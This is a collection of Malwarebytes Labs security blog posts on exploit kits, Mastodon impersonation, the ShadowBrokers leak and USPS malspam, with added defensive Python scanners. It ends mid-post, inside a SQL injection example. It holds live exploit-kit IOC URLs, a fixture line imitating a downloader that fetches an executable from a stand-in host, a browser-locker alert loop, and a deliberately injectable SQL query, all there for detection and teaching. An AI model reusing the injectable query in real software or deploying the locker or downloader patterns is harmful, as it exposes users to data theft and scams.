The post What is a Zero-Day? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Sundown EK gone missing, Terror EK flavours seen in active drive-by campaigns

Malwarebytes - Tue, 04/11/2017 - 21:12

Many security researchers tracking exploit kits have noted the lack of Sundown EK activity for several weeks now. A post from Cisco’s Talos team came off as a bit of a surprise at the end of March (Threat Spotlight: Sundown Matures), but any doubts were squashed by this tweet on April 8th (Sundown (Beps) and Nebula out ? More than one month since last hits).

Also, whatever happened to Bizarro and Greenflash Sundown EKs? Whether this is a temporary break or yet another dead EK, time will tell.

In the meantime, there has been much noise and some activity from an exploit kit that appeared late last year and which we wrote about in early January. Because of similarities with Sundown EK, we initially thought it was simply a new variant, but it turned out to be the work of a different actor, and Trustwave SpiderLabs named it Terror EK.

In this post-Angler era, we have grown accustomed to one-hit wonders and to bogus kits stolen and repackaged for sale under a different name. Simon Kenin at Trustwave tracked and exposed the activities of Terror EK’s author, who goes by the handle @666_KingCobra on various underground forums. To complicate matters further, rebranding is in fashion right now, and Terror EK has also been marketed as Blaze, Neptune, and even Eris.

With all this noise, it’s usually a good idea to look at what is actively being seen in the wild versus what may be advertised here and there. Once we see an exploit kit in various distribution campaigns we know it is at least worth looking at.

Malvertising campaigns

We have been monitoring this particular campaign for some time; it is the best-known instance of Terror EK, and various (low-quality traffic) ad networks are pushing it at the moment.

Main landing page:

IE exploits:

Call to Flash exploits:

Call to Silverlight exploit:

Malware payload: Smoke Loader

Compromised sites campaign

This is a newer campaign we started to notice just a few days ago with the landing and payloads slightly different.

Redirection to EK:

The compromised websites redirect to the exploit kit landing page in two different ways, and both are in use. The first is a server-side 302 redirect:

But there is also another one done via script injection:

We see both in use, but each pushes its own flavour of Terror EK (the ‘classic’ one shown above via malvertising, or the newer one). For example, the script-injection redirect loads uploadrobot.download, which in turn calls the ‘classic’ Terror landing page:

Landing page:

This one stuffs everything into the landing page (rather than via multiple sessions). No lorem ipsum here, but some pretty lengthy text which precedes the various calls for exploits.

IE exploits:

Flash exploits:

Payload deployment (remember ‘Sub fire()‘?)

Malware payload: Andromeda

More copycats on the horizon

Sundown EK was notorious for stealing exploits from others, and the tradition continues with more copy/paste from the ashes of dead exploit kits. Had this harvesting been done on higher-grade EKs we would have a more potent threat, but that isn’t the case here.

If it weren’t for active distribution campaigns, there would be very little to write about those numerous variants until they brought in something more serious to the table.

Malwarebytes users are protected against this exploit kit and its payloads.

IOCs:

Gates:

http://sweetwine.club
http://uploadrobot.download/frame.php

Classic Terror EK patterns:

http://46.101.101.142/e71cac9dd645d92189c49e2b30ec627a/5f9987ccc0625389623525a46116f048
http://46.101.101.142/5f9987ccc0625389623525a46116f048/795819/58e9d4f033acc
http://46.101.101.142/5f9987ccc0625389623525a46116f048/a39401275d1b300aa789fb22aea4148a
http://46.101.101.142/5f9987ccc0625389623525a46116f048/9526e055c9757becf45c5190facfd9f2
http://46.101.101.142/5f9987ccc0625389623525a46116f048/oiuhygnjda.swf
http://46.101.101.142/5f9987ccc0625389623525a46116f048/uploads/wdioj124.swf
http://159.203.185.4/uploads/SilverApp1.xap
http://46.101.101.142/d/5f9987ccc0625389623525a46116f048/?q=r4&r=28bac89052d8b2cb744a71a57b824a84&e=cve20146332

New Terror EK patterns:

http://46.166.185.57/9bfJS8fGH3ajrwj5oLPi3ml8/1nMSGFjFkw5a.php
http://46.166.185.57/9bfJS8fGH3ajrwj5oLPi3ml8/ovRHl8aX9cp4/NyhUcUzgwLZe.swf
http://46.166.185.57/9bfJS8fGH3ajrwj5oLPi3ml8/Zgtb0yL6c0qS/vACS5uJmHoxe.swf
http://46.166.185.57/9bfJS8fGH3ajrwj5oLPi3ml8/Si7RBmLPbtk3/EZZ0lzVwV8ds.swf
http://46.166.185.57/9bfJS8fGH3ajrwj5oLPi3ml8/Gopu04Ttg5s1.php

Flash exploits:

7c9c76fbf156fbc5bffbfce1033d06a35b64cee49c01b09df47fa2642ad1a0b6
890f8756e6ab3bd62a2c3fbd098471e17db56808b19018119c0ad4a26ed7060f
97f107853c99b0de95a3e5b84ad1435e31cb42bd05d495d585e18f81a59a362d

Andromeda:

6b40885fefbce6b1422f568a966c63e2468408f8f979746617c115070fbdd3fe

Smoke Loader:

537ea229cc0d4b65e27ae59286a712a1a8f0f5630b2a945c71d86f6c5dbed848
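The IOC lists above are more useful as URL structure than as literal strings, since the IPs and hashes rotate. As an added example (my code, not Malwarebytes’ detection logic), the following Python turns the two Terror EK patterns into heuristics and runs them over a few constructed proxy log lines. The log format (timestamp, client, method, URL, status) is an assumption for the example; the URLs are the ones listed above plus two benign controls.

```python
import re
from urllib.parse import urlsplit

# Heuristics derived from the Terror EK patterns in the IOC list above.
#  - "classic" Terror: bare IPv4 host, 32-hex-char path segments, .swf/.xap
#    lures, and a /d/ payload request tagged with "e=cve<digits>" in the query.
#  - "new" Terror: bare IPv4 host, one ~24-char mixed-case alphanumeric
#    directory, then 12-char alphanumeric names ending in .php or .swf.
IPV4_HOST = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
HEX32 = re.compile(r"^[0-9a-f]{32}$")
ALNUM_DIR = re.compile(r"^[A-Za-z0-9]{20,28}$")
ALNUM_FILE = re.compile(r"^[A-Za-z0-9]{10,14}\.(?:php|swf)$")
CVE_TAG = re.compile(r"(?:^|&)e=(cve\d{8})(?:&|$)")


def classify_url(url):
    """Return (flavour, reasons): flavour is "classic", "new" or "" (no match)."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    segs = [s for s in parts.path.split("/") if s]
    # A bare IP alone is not worth an alert; it only enables the checks below.
    if not IPV4_HOST.match(host) or not segs:
        return "", ()
    reasons = []
    if any(HEX32.match(s) for s in segs):
        reasons.append("32-hex path segment")
    if segs[-1].lower().endswith(".xap"):
        reasons.append("Silverlight lure (.xap)")
    m = CVE_TAG.search(parts.query)
    if m:
        reasons.append("exploit tag in query: " + m.group(1))
    if reasons:
        return "classic", tuple(reasons)
    if ALNUM_DIR.match(segs[0]) and ALNUM_FILE.match(segs[-1]):
        return "new", ("random alnum directory + 12-char .php/.swf name",)
    return "", ()


# Constructed proxy log lines (assumed format: time client method url status).
SAMPLE_LOG = """\
2017-04-11T20:01:03Z 10.1.2.33 GET http://sweetwine.club/ 200
2017-04-11T20:01:04Z 10.1.2.33 GET http://46.101.101.142/e71cac9dd645d92189c49e2b30ec627a/5f9987ccc0625389623525a46116f048 200
2017-04-11T20:01:05Z 10.1.2.33 GET http://46.101.101.142/5f9987ccc0625389623525a46116f048/oiuhygnjda.swf 200
2017-04-11T20:01:06Z 10.1.2.33 GET http://46.101.101.142/d/5f9987ccc0625389623525a46116f048/?q=r4&r=28bac89052d8b2cb744a71a57b824a84&e=cve20146332 200
2017-04-11T20:02:10Z 10.1.2.57 GET http://46.166.185.57/9bfJS8fGH3ajrwj5oLPi3ml8/1nMSGFjFkw5a.php 200
2017-04-11T20:02:11Z 10.1.2.57 GET http://46.166.185.57/9bfJS8fGH3ajrwj5oLPi3ml8/ovRHl8aX9cp4/NyhUcUzgwLZe.swf 200
2017-04-11T20:03:00Z 10.1.2.90 GET http://10.0.0.5/static/app.js 200
2017-04-11T20:03:01Z 10.1.2.90 GET http://example.com/index.html 200
"""


def scan_log(text):
    """Return (client, flavour, url, reasons) for every line that trips a heuristic."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue
        client, url = fields[1], fields[3]
        flavour, reasons = classify_url(url)
        if flavour:
            hits.append((client, flavour, url, reasons))
    return hits


if __name__ == "__main__":
    for client, flavour, url, reasons in scan_log(SAMPLE_LOG):
        print(f"{client} {flavour:8s} {url}  [{'; '.join(reasons)}]")
```

Note that the gate (sweetwine.club) is not caught by the structural rules because it is an ordinary hostname; gates still need a plain blocklist. The bare-IP requirement keeps the noisy internal request to 10.0.0.5 out of the results.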

The post Sundown EK gone missing, Terror EK flavours seen in active drive-by campaigns appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Mastodon: different social network, additional risks

Malwarebytes - Tue, 04/11/2017 - 15:00

Mastodon is a social network that’s a few months old and it’s been mentioned on news sites quite a lot recently, leading users to sign up to an instance and check it out.

I have noticed that some newcomers treat it like any other social network, without realizing that its differences open up opportunities that less scrupulous individuals could take advantage of if new users aren’t aware of the risks.

Mastodon’s decentralization is its key selling point: no one person “owns” the entire network. Anyone can set up a Mastodon server (“instance” in the community parlance) that can communicate with anyone over the entire network. (There are differences: some instances can choose to only allow contact with certain other instances or even no other instances.) In some ways, this is a good thing: the main benefit cited has been a lack of advertising directly from the social network itself, which removes certain threats that have been seen on other social networks – for example, phishing on Twitter via sponsored posts, or malvertising on Facebook leading to tech support scams.

 

Usernames aren’t unique

However, usernames on Mastodon are not unique across the entire network; only per instance. If you registered as @somerandomuser on the mastodon.social instance, your full Mastodon username would be @somerandomuser@mastodon.social; some other person could register as @somerandomuser on the mastodon.xyz instance, and therefore be @somerandomuser@mastodon.xyz. Users are, quite naturally, describing this situation using a comparison with email addresses.

Just as phishing exists over email, similar attacks could occur on Mastodon: a malicious user registers on one instance with the username of someone on another instance, clones their profile, and tries to social engineer their followers. Users on other instances will see the full Mastodon username including the instance name, but on some clients (the web client among them) a long enough username is truncated, cutting the instance name off. For an example, see the screenshot below, where the full username of @munin@mastodon.hasameli.com is not visible:

There is a way to show the full URL to the user’s profile including their instance: hover over their display name or profile picture – both are links to the profile of a user. Of course, a malicious user could set up an instance of their own with a domain name very similar to an existing instance, so be sure to double check the URL.
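The two checks described above (compare the full address, not just the local part, and look closely at the instance domain) are easy to get wrong by eye. As an added example (my code, not Mastodon’s), here is the comparison done mechanically against a constructed address book of trusted full addresses. The trusted list, the similarity threshold and the verdict names are assumptions for the example.

```python
import re
from difflib import SequenceMatcher

# Local part, then an instance; the instance is allowed any non-space, non-@ text
# so that non-ASCII lookalike domains reach the check below instead of failing to parse.
HANDLE = re.compile(r"^@?([A-Za-z0-9_]+)@([^\s@]+)$")

# Constructed address book: the full addresses you actually know and trust.
TRUSTED = {
    "munin@mastodon.hasameli.com",
    "somerandomuser@mastodon.social",
}

SIMILAR = 0.85   # assumed threshold for "this domain looks like that one"


def parse_handle(handle):
    """Split '@user@instance' into (user, instance), lower-cased.
    A bare '@user' is rejected: without the instance there is nothing to verify."""
    m = HANDLE.match(handle.strip())
    if not m:
        raise ValueError(f"not a full Mastodon address (need @user@instance): {handle!r}")
    return m.group(1).lower(), m.group(2).lower()


def _similar(a, b):
    return SequenceMatcher(None, a, b).ratio()


def check_handle(handle, trusted=TRUSTED):
    """Return (verdict, detail). Verdicts: trusted, non-ascii-instance,
    lookalike-instance, same-name-other-instance, unknown."""
    user, inst = parse_handle(handle)
    full = f"{user}@{inst}"
    if full in trusted:
        return "trusted", full
    if not all(ord(c) < 128 for c in inst):
        # Internationalised domain: show the punycode form so the reader sees it is not plain ASCII.
        return "non-ascii-instance", f"{inst} -> {inst.encode('idna').decode()}"
    for t in sorted(trusted):
        t_user, t_inst = t.split("@", 1)
        if inst == t_inst:
            continue                      # same server, different person: an ordinary stranger
        lookalike = _similar(inst, t_inst) >= SIMILAR
        if user == t_user:
            # Same local part on a different server: the impersonation setup described above.
            kind = "lookalike-instance" if lookalike else "same-name-other-instance"
            return kind, f"{full} is not {t}"
        if lookalike:
            return "lookalike-instance", f"{inst} resembles {t_inst}"
    return "unknown", full


if __name__ == "__main__":
    for h in ("@munin@mastodon.hasameli.com", "@somerandomuser@mastodon.xyz",
              "@munin@mastodon.hasamell.com", "@alice@mastodon.social"):
        print(h, "->", check_handle(h))
```

The point of the `non-ascii-instance` verdict is that a client displaying Unicode domains makes a lookalike trivial to register; seeing the punycode form (`xn--…`) is the only reliable tell.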

 

No verified accounts

Additionally, because of decentralization there is no concept of “verified accounts” as on centralized social networks (some Mastodon users have taken to putting green checkmark emojis in their display names as a joke). This means you cannot trust any corporate account on a “mainstream” Mastodon instance. What decentralization does allow is for corporate entities to set up their own instances, so that the instance name itself proves they are who they say they are: just as a company’s support email address might be support@example.com, it could have Mastodon accounts such as @support@mastodon.example.com or @promotions@mastodon.example.com. Time will tell whether this actually happens (it would be a good thing, as it lets companies own their social media presence); some Mastodon users have suggested that big brands will just do the bare minimum and create an account on an existing instance, which would leave their customers more exposed to social engineering than they would otherwise be.
I would also like to point out that plans have been mentioned for letting a user set a URL and prove control of that site via a DNS TXT record; whether this will end up being implemented is unknown.

 

No deleting accounts

Another consequence of decentralization is that you cannot really delete accounts on Mastodon: you can ask your instance administrator to delete your account, but parts of it will remain on other instances. Nor can you delete toots that have already been federated to other instances. Deleting accounts (or federated toots) makes little sense under decentralization; using the email analogy again, you can change your email address, but the people you emailed still have the messages you sent them. Given that centralized social networks seem to have let people forget the rule that “if you post something on the Internet, it stays on the Internet forever” (because people copy it elsewhere), it’s debatable whether this is a good or bad thing. Mastodon’s granular privacy settings mean that if this worries you, you can set your toots to never leave your instance and tell your friends to sign up on the same instance as you.

Conclusion

Mastodon is a style of social network that will be a new idea to many newcomers. It’s still in development, so there’s some missing functionality that can lead to additional risk (and some of that functionality does not make sense to this style of social network, anyway). You will want to be more careful on Mastodon; making a mistake could be more costly there.

The post Mastodon: different social network, additional risks appeared first on Malwarebytes Labs.

Categories: Techie Feeds

GameStop customer data allegedly siphoned in possible breach

Malwarebytes - Mon, 04/10/2017 - 22:05

GameStop, a well-known retailer of video games, electronics, and wireless services, confirmed with KrebsOnSecurity that they are currently investigating reports of hackers breaching their network and siphoning customer information.

After receiving notice from a third party that payment card data has been on sale on a website, a spokesperson from GameStop said, “That day a leading security firm was engaged to investigate these claims. Gamestop has and will continue to work non-stop to address this report and take appropriate measures to eradicate any issue that may be identified.”

KrebsOnSecurity further notes that the stolen data may have included customer card numbers, expiration dates, names, addresses, and card verification values (CVV2), the three digits on the back of the card beside the signature strip, which online merchants are typically not permitted to store after authorization. Stolen CVV2s suggest that malware was capturing data as it was entered on GameStop’s transaction site.

If you, dear Reader, used your debit or credit card on GameStop’s website between mid-September 2016 and early February 2017, check your statements for that whole period (going back as far as you can) for questionable charges. If you find any, call your bank and report them.

Lastly, when purchasing online, it is best to use a credit card over a debit card as the former usually has better overall fraud protection than the latter.

The post GameStop customer data allegedly siphoned in possible breach appeared first on Malwarebytes Labs.

Categories: Techie Feeds

ShadowBrokers fails to collect 1M bitcoins – releases stolen information

Malwarebytes - Mon, 04/10/2017 - 17:49

ShadowBrokers finally made good on their promise to release the decryption key to unlock the stolen ‘auction’ file purportedly filled with NSA hacking tools.

Over the weekend, the hacking group ShadowBrokers released the decryption key for the ‘auction’ file that was included in the dump of information from last summer that the group claimed they acquired from Equation Group – reportedly a well-known hacking team responsible for highly sophisticated malware campaigns such as Flame and Stuxnet and possibly associated with certain 3-letter government agencies.

While the group’s get-rich-quick plan to sell the auction file for the astronomical asking price of 1M bitcoins (roughly $1,186,510,000 US dollars as of today) ended in spectacular failure, the team has made good on its promise to release the stolen information should the requested payoff not be received. It is difficult, if not impossible, for us to verify the hackers’ claims or to attribute the material to the appropriate group, but there are interesting bits of information in the archive and we will document some of the early discoveries here.

The release of the key came in a highly politicized tirade directed at President Donald Trump, touching on everything from Obamacare and Goldman Sachs to Syria, Steven Bannon, and John McCain. The epic rant discusses the Alien and Sedition Acts of 1798, social collectivism, white privilege, Russia, and even Magog (I had to look it up too; the Islamic interpretation of the word seems most applicable). For a group implying it is made up of American citizens, and in the eyes of any high-school English teacher, it’s a cringe-worthy read filled with grammatical, spelling, and punctuation errors (although, good use of the Oxford comma), and it uses a variety of written dialects and cultural references throughout. All of these appear to be deliberate false flags to conceal the identity of the person or group behind the original attack.

 

Exploits

There are a number of tools in the dump with notes and code that indicate possible exploits against various software and products. A majority of the files seem to target Linux and Solaris-based servers. Though many of the exploits are dated from many years ago, some as far back as 2003, it’s possible they are still usable on legacy systems. While we can’t confirm the authenticity of the following exploits, we will provide a small snippet from the collection below.

ElatedMonkey is a local privilege escalation exploit against the cPanel Remote Management Web interface current through at least version 24:

 

ElginGamble is a ‘public’ vulnerability affecting Linux 2.6.13 – 2.6.17.4 to create a cron script capable of spawning a root shell:

 

PTrace/ForkPTY is a kernel exploit affecting Linux 2.2 – 2.4:

 

EngageNaughty is an Apache and SSL exploit:

 

EasyStreet appears to be some sort of UDP exploit utilizing sendmail:

 

EBBSHAVE is a vulnerability affecting Solaris RPC services version 2.10:

 

EXCELBERWICK is a remote exploit against xmlrpc.php on Unix based systems:

 

Tools

Aside from the partial selection of exploits posted above, the dump also contains a number of tools, utilities, and scripts to deploy once successful exploitation of the system occurs.

 

Strifeworld is a TCP session recorder that dates from 2001:

 

EndlessDonut helps deploy monitoring agents and to maintain a clean record:

 

Ys.auto is an encompassing script that assists with the deployment of various RATs and system monitors. It’s a curious footnote that the Ford Motor Company IP address appears within a number of files under the ‘example’ section:

 

ELECTRICSLIDE.pl is a Perl script that, as pointed out by x0rz, impersonates a Chinese browser using a fake Accept-Language header:

 

A number of documents reference the deployment of RATs (Remote Access Trojans) to compromised machines. The vast majority of these files appear to target various Solaris, Linux, and FreeBSD clients – just based off their naming conventions. Additional analysis of these files will surely be published in coming days:

 

There also appears to be a number of tools, documents, or scripts that reference cell phone information.

Cdrprint.pl is a script that takes CDRs (call detail records) and pretty-prints them. CDRs are created when call information or other telecommunications transactions (text messages, for instance) pass through a processing facility or device. They are accompanied by ‘definition’ files, which, to the best of my understanding, help parse the collected data for specific phones:

 

Within the targets.py file, there are strings and IP addresses relating to the Russian division of Sprint Telecom:

 

The information in this dump is extensive, and it will take security researchers some time to digest. While many of the exploits appear to be public and quite old, it is entirely possible that they remain useful against legacy systems.

But after spending ample time over the weekend poring over the data, I fail to see the value behind ShadowBrokers’ initial asking price of 1M bitcoins for an archive filled with publicly known (and probably patched) vulnerabilities dating as far back as 2003. Nothing appears to be more recent than 2013, so the information is likely obsolete and possibly no longer in use. This appears to be either a massive failure on the part of ShadowBrokers or a giant prank done for the lulz, as there is no way they could have thought this material was worth anywhere near what was being asked. There is still a lot of information to analyze, though, so time may prove this initial assessment wrong. We will continue to analyze the included material, including the Windows-based files, and update this post if new information becomes available.

Regardless, another public disclosure of valuable information reminds us once again of the value of OPSEC and secure data retention.

The post ShadowBrokers fails to collect 1M bitcoins – releases stolen information appeared first on Malwarebytes Labs.

Categories: Techie Feeds

USPS-themed malspam now delivering 1-2-3 knock-out

Malwarebytes - Mon, 04/10/2017 - 15:00

We’ve detected an uptick in USPS-themed malspam walloping users with a 1-2-3 knock-out of nasty malware designed to infiltrate your system and steal all your most valuable information. This malware-laced email is actively being distributed with various Subject and Body messages containing references to missing and/or late USPS parcels.

Example of USPS-themed malspam

Should recipients be convinced by the message, unpack the attached file “Delivery-Details.zip” and then, against their better judgment, launch the enclosed JavaScript file Delivery-Details.js, they will be subjected to a slew of malware designed to commandeer their PC and steal their most valuable financial information.

Deobfuscated Javascript showing server addresses

 

This particular downloader, known by some as JS/Nemucod or simply JS/Downloader by others, is a well-known JavaScript downloader that is sent out via spam email. Historically this downloader will install 1 or 2 different malware families to infected machines, but the most recent campaign has upped that to 3 different malware families being installed post-detonation.

Shows installed payloads

The 3 malware families are all different in their design but make no mistake about it, all 3 will compromise your security and put your financials at risk.

Trojan.Nymaim is first to come down the line using filename exe1[1].exe. This Trojan provides attackers with remote access to infected machines allowing for everything, from the collection of banking credentials to backdoor functionality allowing attackers full use of the machine.

Trojan.Nymaim at execution

Trojan.Kovter comes down next as exe2[1].exe, dressed up with a Winamp icon and a Nullsoft description. Kovter is known as fileless malware for its ability to execute code directly from the registry. It can also steal personal information, download additional malware, or grant attackers full use of the machine. The image below shows how Trojan.Kovter achieves its ‘fileless’ persistence with JavaScript commands embedded in the Windows registry.

Finally, exe3[1].exe is identified as Trojan.Boaxxe, which as you may guess is also a Trojan with backdoor and stealing capabilities. This Trojan scans the PC for any trace of information deemed valuable by the creators and transmits this information to the attacker’s server for use in further attacks. Information is saved in the form of encrypted registry strings that are continuously updated by the malware.

Information harvesting

 

Taken together, these 3 malware families will take hold of your machine, drain your bank accounts, and leave you high and dry. So just be wary of suspicious looking shipping notices arriving via email and never install files received in email without certainty of their origin.

But should you find yourself curious about the contents of this email and tempted to run the enclosed JavaScript file in the hope of finding that lost USPS package, have no fear: Malwarebytes has your back.

 

IOC’s:

Delivery-Details.js  –  877480DBDE4FCFF9E21E294EF6B64E50

Exe1[1].exe – F22807784588C2117457634494943729

Exe2[1].exe – B10A08A1ACB1B42CA91032EBED613A2A

Exe3[1].exe – 423213BD6A167D4B7DEEC18E7B18E13E
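The whole chain above starts with a .zip that hides a .js, so a mail gateway or analyst script only needs to look inside the archive to stop it. As an added example (my code, not Malwarebytes’ detection), the following Python triages a zip attachment in memory: it hashes each member against the MD5 IOCs listed above, flags script or executable members regardless of hash, recurses into nested zips, and refuses to inflate oversized members. The sample attachment and the script body in it are constructed, so its hash will not match the real IOC; the size cap and extension list are assumptions.

```python
import hashlib
import io
import zipfile

# MD5 IOCs from the post above, lower-cased for comparison.
IOC_MD5 = {
    "877480dbde4fcff9e21e294ef6b64e50": "Delivery-Details.js (JS/Nemucod downloader)",
    "f22807784588c2117457634494943729": "exe1 - Trojan.Nymaim",
    "b10a08a1acb1b42ca91032ebed613a2a": "exe2 - Trojan.Kovter",
    "423213bd6a167d4b7deec18e7b18e13e": "exe3 - Trojan.Boaxxe",
}

# Extensions Windows runs on double-click (assumed list; extend to taste).
SCRIPT_EXT = (".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta",
              ".ps1", ".cmd", ".bat", ".scr", ".exe")
MAX_MEMBER = 50 * 1024 * 1024     # zip-bomb guard: never inflate more than this per member
MAX_DEPTH = 3                     # nested-archive limit


def md5_hex(blob):
    return hashlib.md5(blob).hexdigest()


def make_zip(members):
    """Build an in-memory zip from {name: bytes}; used only to construct sample input."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, blob in members.items():
            zf.writestr(name, blob)
    return buf.getvalue()


def triage_zip(data, iocs=IOC_MD5, _depth=0):
    """Return a list of (member_name, md5, reason) findings for a zip attachment."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return [("<archive>", "", "not a valid zip")]
    with zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name, low = info.filename, info.filename.lower()
            if info.file_size > MAX_MEMBER:
                findings.append((name, "", f"refused: {info.file_size} bytes uncompressed"))
                continue
            blob = zf.read(info)
            digest = md5_hex(blob)
            if digest in iocs:
                findings.append((name, digest, "known IOC: " + iocs[digest]))
            elif low.endswith(SCRIPT_EXT):
                findings.append((name, digest, "script/executable inside archive"))
            elif low.endswith(".zip") and _depth < MAX_DEPTH:
                for n, d, r in triage_zip(blob, iocs, _depth + 1):
                    findings.append((f"{name}/{n}", d, r))
    return findings


# Constructed sample mimicking the lure: a .js downloader beside a decoy text file.
# The script body is made up, so its MD5 will not match the real IOC above.
SAMPLE_ZIP = make_zip({
    "Delivery-Details.js": b"var u=['http://198.51.100.7/exe1.exe'];/* constructed */",
    "USPS-notice.txt": b"Your parcel could not be delivered.",
})

if __name__ == "__main__":
    for name, digest, reason in triage_zip(SAMPLE_ZIP):
        print(f"{name:24s} {digest} {reason}")
```

Hash matching only catches the exact samples listed; the extension rule is what catches tomorrow’s recompiled Delivery-Details.js, which is why the two checks are kept separate.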

The post USPS-themed malspam now delivering 1-2-3 knock-out appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (Apr 03 – Apr 09)

Malwarebytes - Mon, 04/10/2017 - 14:59

Last week, we gave an overview of what might happen once the bill the US Congress passed in late March takes effect; familiarized readers with the “3-2-1 rule”, which is very helpful in protecting valuable data against ransomware, and pushed out a follow up post on Diamond Fox, a bot used by the Nebula exploit kit. In case you want a refresher of part 1, click here.

Lead analyst Jérôme Segura documented a malvertising campaign targeting iOS users, a notable shift in targets. Users were enticed to download a ‘free’ VPN app called My Mobile Secure via rogue ads on torrent sites.

Finally, our experts dished out a list of the five dumbest cyber threats that (unfortunately) work.

Below are notable news stories and security-related happenings:

  • Facebook Turns To Image Recognition to Thwart Revenge Porn. “Revenge porn is the province of the jilted and the jealous, the malicious and the envious. Typically it happens when two people in a relationship share intimate or sexual pictures or videos via text or email; post-break-up, or in the hands of ‘frenemies,’ this content may be posted publicly as payback for heartbreak or other perceived transgressions. It can be enormously damaging for victims, especially younger teen girls.” (Source: InfoSecurity Magazine)
  • IoT Malware Starts Showing Destructive Behavior. “Hackers have started adding data-wiping routines to malware that’s designed to infect internet-of-things and other embedded devices. Two attacks observed recently displayed this behavior but likely for different purposes.” (Source: CSO)
  • New Malware Deliberately Destroys Unsecured IoT Devices. “Cybersecurity experts are warning of a new type of malware strain that uses known default user credentials to attack unsecured Internet of Things (IoT) devices and destroy them, reports Bleeping Computer. Discovered by cybersecurity firm Radware, BrickerBot has two versions – BrickerBot.1 and BrickerBot.2 – and was found to be active since March 20, targeting only Linux BusyBox-based devices with Telnet ports left open.” (Source: Dark Reading)
  • 20,000-bots-strong Sathurbot Botnet Grows By Compromising WordPress Sites. “A 20,000-bots-strong botnet is probing WordPress sites, trying to compromise them and spread a backdoor downloader Trojan called Sathurbot as far and as wide as possible.” (Source: Help Net Security)
  • “iCloud Mail” Phishing Emails Doing Rounds. “The latest email phishing campaign targeting Apple users is aimed at gathering as much information as possible from unfortunate victims. The email, made to look like it comes from Apple, bids targets welcome to iCloud Mail, but warns that the company has been unable to confirm their account information, and that their account has, therefore, been suspended.” (Source: Help Net Security)
  • Matrix Ransomware Spreads To Other PCs Using Malicious Shortcuts. “Brad Duncan, a Threat Intelligence Analyst for Palo Alto Networks Unit 42, has recently started seeing the EITest campaign use the RIG exploit kit to distribute the Matrix ransomware. While Matrix has been out for quite some time, it was never a major player in terms of wide spread distribution.” (Source: Bleeping Computer)
  • Hackers Empty ATMs By Drilling One Small Hole. “Hackers are using a combination of low and high-tech attacks to make ATMs spit out cash, according to Kaspersky researcher Igor Soumenkov, who presented this novel attack at this year’s Security Analyst Summit, taking place in St. Maarten this week.” (Source: Bleeping Computer)
  • Hackers Steal $30M from IRS Via Student Loan Tool. “Hackers managed to breach the IRS’s Data Retrieval Tool, which is used by parents to transfer financial information for their kids using the Free Application for Federal Student Aid. The system has been shut down until the IRS can figure out which of the requests were made by legitimate students, and which were made by criminals.” (Source: Softpedia)
  • Update Your iPhone To Avoid Being Hacked Over Wi-Fi. “It’s only been five days since Apple’s last security update for iOS, when dozens of serious security vulnerabilities were patched. As we mentioned last week, the recent iOS 10.3 and Mac OS 10.12.4 updates included numerous fixes dealing with ‘arbitrary code execution with kernel privileges’.” (Source: Sophos’ Naked Security Blog)
  • Wonga Data Breach Puts Up To 245,000 UK Current And Former Customers At Risk. “If you are one of those affected, my advice is to be very wary of unsolicited phone calls and emails that might be from scammers attempting to exploit the information. You would also be wise to keep a close eye on your finances for any unexpected transactions.” (Source: Graham Cluley’s Blog)

Safe surfing, everyone!

The Malwarebytes Labs Team

The post A week in security (Apr 03 – Apr 09) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

The top 5 dumbest cyber threats that work anyway

Malwarebytes - Sat, 04/08/2017 - 15:00

The common conception of cyber attacks is kind of like bad weather: ranging from irritating to catastrophic, but always unpredictable. Hackers are simply too sophisticated to draw any reliable judgments on and we shouldn’t try. As it turns out, some hackers are fairly predictable in their successful use of really dumb attacks. Here’s a few.

1. The Browser Locker

The browser locker, better known as the fake blue screen of death, sprays gibberish errors at the user and implores them to call an Indian boiler room, where they are scammed out of $500 on average. Feature tweaks by the major browsers have pushed tech support scammers toward more creative iterations, including registry hacks that replace the Windows shell itself with a locker. But the browser locker still exists in bulk and still draws victims. Some lockers show ingenuity, such as manipulating the browser’s history function, but most are some variation of:

    // Loop "a lot" of times, so the page can't be closed between dialogs.
    for (var i = 0; i < 1000000; i++) {
        alert("You have a virus, please call Scam Number");
    }

It’s novice-level code that has caused hundreds of millions in losses. Mitigations are wide-ranging: ad blockers (most browser lockers are delivered via malvertising), disabling JavaScript in the browser, not downloading software from third-party app stores, and simply force-quitting a locked browser.

2. DDOS Extortion

With DDoS bots for sale, sometimes on the clearnet, denial of service itself is not the most sophisticated of attacks. DDoS extortion is one notch lazier; an attacker will simply send an email to a corporate security staff threatening massive attacks if a bitcoin ransom isn’t paid immediately. Given that the ransom in question has tended to be relatively low, companies in industries requiring continuous uptime have sometimes shrugged their shoulders and paid. If this happens to you, talk to your service provider to work out mitigations; don’t talk to the attacker.

3. SQL Injection

SQL injection takes a modicum of technical skill to pull off, from finding the vulnerable site to executing the injection and safely exfiltrating the dumped data. So why is it a dumb attack? Because it was first publicly discussed in 1998. It was in the OWASP Top 10 in 2007 and 2010, and #1 on the OWASP Top 10 in 2013. This is a known, predictable attack with extensive mitigations, so continuing to see it so frequently is profoundly dumb.
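The “extensive mitigations” amount to one habit: never let user input become SQL syntax. As an added example (my code, not from the original post), here is the vulnerable lookup beside the parameterized one, run against a constructed in-memory SQLite table, plus the one case parameters cannot cover (an ORDER BY column name), which has to be allowlisted instead. Table layout, row data and the payloads are all constructed for the example.

```python
import sqlite3

# Constructed table for the example: two users, one of them an admin.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pw_hash TEXT, is_admin INT)")
    con.executemany("INSERT INTO users (name, pw_hash, is_admin) VALUES (?, ?, ?)",
                    [("alice", "h1", 1), ("bob", "h2", 0)])
    return con


def find_user_vulnerable(con, name):
    # String formatting splices attacker-controlled text into the SQL itself:
    # a quote in `name` ends the literal and the rest is parsed as syntax.
    sql = "SELECT id, name FROM users WHERE name = '%s'" % name
    return con.execute(sql).fetchall()


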